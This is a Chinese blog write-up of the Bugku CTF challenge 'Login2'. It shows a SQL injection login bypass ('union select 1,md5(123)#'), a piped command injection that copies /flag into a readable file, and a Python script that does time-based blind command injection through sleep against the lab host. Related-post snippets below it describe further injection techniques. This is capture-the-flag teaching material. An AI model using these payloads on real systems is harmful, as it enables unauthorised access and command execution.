bugku上Login2

已于 2022-03-15 14:09:04 修改
阅读量1.9k 收藏 3
点赞数 3
分类专栏: bugku题目wp 文章标签: python
于 2022-03-14 18:00:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58111246/article/details/123482301
版权

1: 打开环境,是一个页面登陆界面,不能注册,破?union select绕过,

(有的师傅先sqlmap,发现啥啊也没有;python sqlmap.py -r sql.txt --level 5 --batch
–batch //选项不询问,全部按照默认,发现有注入点,然后爆它数据库--dbs,表--table,爆列名,得到id,username和password,在爆字段,发现是空的

2:那就打开bp,火狐(这里推荐)就不用去设置进行设置代理了

3:先在登录界面随便输入一些东西, admin,123,再进行抓包, 也可以用浏览器抓包,里面找到这个tip(还是人性的,没有难度)

tip: JHNxbD0iU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkIEZST00gYWRtaW4gV0hFUkUgdXNlcm5hbWU9JyIuJHVzZXJuYW1lLiInIjsKaWYgKCFlbXB0eSgkcm93KSAmJiAkcm93WydwYXNzd29yZCddPT09bWQ1KCRwYXNzd29yZCkpewp9

 base64解码得

 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样

payload为username=admin' union select 1,md5(123)#&password=123   , 或者是这样的>Venus的md5值=0bdc508a17811a3a860d32749ad44e4b

username=Venus'union select 1,'0bdc508a17811a3a860d32749ad44e4b'#&password=Venus

(密码的md5值要等与你填的密码,我这里是123)

 4:图上就是绕过登录页面了,显示登陆成功,放包后就得到如图页面了

 我随便输了一些,ls, flag, 123|ls, Venus&ls, Venus;ls发现有些没有回显,会不会可能是过滤?

查了查,有可能是命令被过滤了,也有可能是命令执行了但输出过滤了

 他们做到这里用到脚本了,我整不出他们做出来的结果

5:利用管道符绕过,采用写入文件二次返回的方法查看结果

想了想,看看有没有flag的目录

在检测框输入123| cat /flag > test, 检测、然后直接查看test目录下的东西。得到flag{}

**##&&其实这个题我看很多人都是用到脚本了

 我跑了不过我是这样的:`ls`:css index.php login.php test。一样的我建议管道符做,被坑的经验

 也可能我哪里弄错了导致出不来他们说的那个fLag_~~~.txt,(index.php,login.php去掉)有的话就直接环境地址url/fLag_~~~.txt

就能成功访问到flag了

import requests

url = 'http://114.67.246.176:16619/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''

database = ''
flag = 1
comm = input('输入指令:')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
           'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
           'Referer': 'http://114.67.246.176:16619/index.php',
           }
cookies = dict(PHPSESSID='o6fnka50kbj2mh9u5k27paijd6')
for i in range(0, 100):  # 根据自身需要改长度,如果空格连续出现四次以上,就说明后续没内容了
    for j in allString:
        if j == "^":
            j = " "
            data = {'c': "123;a=`" + comm + "`;b=' ';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        else:
            data = {'c': "123;a=`" + comm + "`;b=\'" + str(j) + "\';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
        r = requests.post(url, data=data, headers=headers, cookies=cookies)
        t = r.elapsed.total_seconds()
        # print(r.text)
        print(database + j + ' 的时间'+ ' 是 ' + str(t))
        if t >= 3:
            database = database + j
            print(str(i) + ' 为 ' + j)
            break
        elif t < 3 and j == 'M':
            flag = 0
            break
    if flag == 0:
        break
print('', database)

该用户正摸鱼
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3438
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
php修改后台登陆密码,ecshop修改后台登陆密码
weixin_39754616的博客
03-28 238
第一种:把下面的代码写入到reset.php中
BugKu_login1
Kobalos的博客
09-06 422
直接访问目标地址,发现是一个管理系统的页面 这时候看到了提示题目给的提示: hint:SQL约束攻击,去百度了一下知识点 简单总结利用方法就是:在sql的搜索中,admin等同于admin+若干空格,而admin和admin+若干空格可以分别创建账号,在登录时输入admin,则会调用admin们的密码,只要有匹配成功的即可登录,实现任意用户登录 回到题,根据题目的login可以猜想,利用sql约束成功登录应该就可以得到flag,先随便创建一个账号试试。 随便创建的用户显示不是管理员权限,那么在创建.
bugku login2
偷一个月亮
06-29 973
Bugku web login2
qq_41696858的博客
07-26 508
今天中午忙着去吃饭,场景过时了,就没法录视频了,简单说一下吧: 前面都一样,通过sql注入过登录界面,先随便提交点啥,burp抓包,发现response有base64编码内容,解码发现是php代码 $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['password']===md5($password)){ } 由于没有限制行数,盲猜可以un
ng2-login demo
09-27
【ng2-login demo】是一个基于Angular 2(现在应该是Angular,因为Angular 2已经更新了多个版本)构建的登录组件示例。这个项目为开发者提供了一个快速启动的模板,特别是对于那些正在学习Angular或者需要在自己的...
2-login.defs
07-20
2-login.defs
struts2_login.7z
11-21
在这个"struts2_login.7z"压缩包中,包含了一个使用Struts2实现的登录功能的源代码,非常适合初学者或有经验的开发者来学习和理解Struts2的工作原理。 首先,Struts2的核心是Action类,它是业务逻辑处理的入口点。...
Struts2_Login.zip
08-03
使用了struts2截至目前最新版2.5.22+MySQL8.0+druid 1.1.10实现了简单的登陆功能,可以在此基础上进一步增加注册功能,代码逻辑和登陆没什么区别,可以使用纯JDBC替代druid数据库连接池。仅仅是再提供一个数据库工具...
LogIn_login_
10-02
Login simple web app
bugku login2(skctf) shell盲注
zazazrt的博客
02-18 3426
首先说下是看了这篇文章以后根据大佬的wp写的脚本。脚本也是别的地方抄的改的 https://www.cnblogs.com/blili/p/9045280.html 如何绕过上面这篇写的很详细了可以参考上面这篇绕开登录,笔者做了测试盲注了数据库skctf发现作者很gou项里面没有数据 下面附上盲注的脚本: import requests url = 'http://123.206.31....
bugkuctf–login4字节翻转攻击
超人学飞的日子
06-13 4267
题目地址:http://118.89.219.210:49168/字节翻转攻击原理:http://www.anquan.us/static/drops/tips-7828.htmlhttp://www.freebuf.com/articles/system/163756.html尝试登陆:普通用户无法查看,用户名改为admin,密码任意:admin又不允许登陆,并且密码是任意输入的,也就是说关键点...
login1(SKCTF)(bugku
hhh
09-29 2086
  这周学长出了两道二次注入的题(再也不能直接用sqlmap水过去了……)第一道现在还没写出来QAQ,但是从第二道多少学习了一下手工注入的一些操作。   先是看了几篇讲解约束注入的博客,这个博主小姐姐超厉害,在这里就说一下自己的理解: 约束SQL注入的原理就是利用的约束条件,比如最长只能有15个字符的话,如果你输入的是abcdefghijklmnop(16位),那么保存在数据库里的就是abcd...
bugku - login1(SKCTF)
多崎巡礼的博客
09-04 1523
关于sql的约束攻击资料可参考 https://blog.csdn.net/qq_42357070/article/details/82379183 本题可利用注册账户“admin                                       1”(admin后面空格超过预设的“n”个字符/varchar(n))即可 密码自定义 数据库实际写入的是admin/密码 登陆即可...
Bugku sql注入2 writeup
xuchen16的博客
10-08 4303
转载自:http://hu3sky.ooo/2018/08/18/bugku%20sql2/ 网上没有一个正常做出来了的 看了叶师傅的wp,跟着学一遍 username的注入,盲注 根据username的返回不同 fuzz,几乎都过滤完了。 没过滤的 !,!=,=,+,-,^,% 数字型时,可以用^进行闭合 and这些也被过滤。 需要用到-1-'admin'-1-'' = -1'admin'-...
BUGKU WP-点login咋没反应
m0_55631425的博客
06-20 95
打开题目,查看源代码 别的没有,发现css有提示,点击后面没用,前面让试试访问?3755,访问代码审计 由题知,当elseif (unserialize(cookie)==="cookie) === "cookie)==="KEY") 时,即得flag。且$cookie=COOKIE[‘BUGKU’] ...
Bugku题解-Sql注入2(web)
flying_bird2019的博客
12-05 397
sql注入2 题目不难,但是真的用了好长时间研究(主要原因是本地数据库和题目环境不太一样)这题真的是一言难尽。。不知道出题人nb还是sb。。。(我寻思这篇文章不能被他本人看到吧) 先来说一下非注入的解法 方法一 要拿到flag就得先用账户登录成功,flag并不在数据库里,我先尝试了用字典爆破admin密码,没想到竟然成功了??? 后来发现竟然是弱口令!!!uname=admin passwd=admin123 (ps:果然,只要是人写出来代码就有可能存在安全漏洞,这种非预期解出题人直接原地去世。。。后面还有
Bugku WEB 你从哪里来
qq_41696858的博客
07-14 176
就怕直接把答案直接给你了,提示,你是从google来的吗,题目,你从哪里来 说不是加Referer我都不信 burpsuite抓包,加referer头,即可得到flag referer:http://www.google.com 参考视频链接:https://www.bilibili.com/video/BV1bq4y1W7qC/ ...
流行Login界面设计分析
"Login界面设计分析" 在当前数字化时代,用户界面(UI)设计,尤其是登录界面,对于用户体验和品牌形象至关重要。登录界面不仅是用户进入系统的入口,也是展示产品特性和吸引用户的第一印象。本文将基于对市场流行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值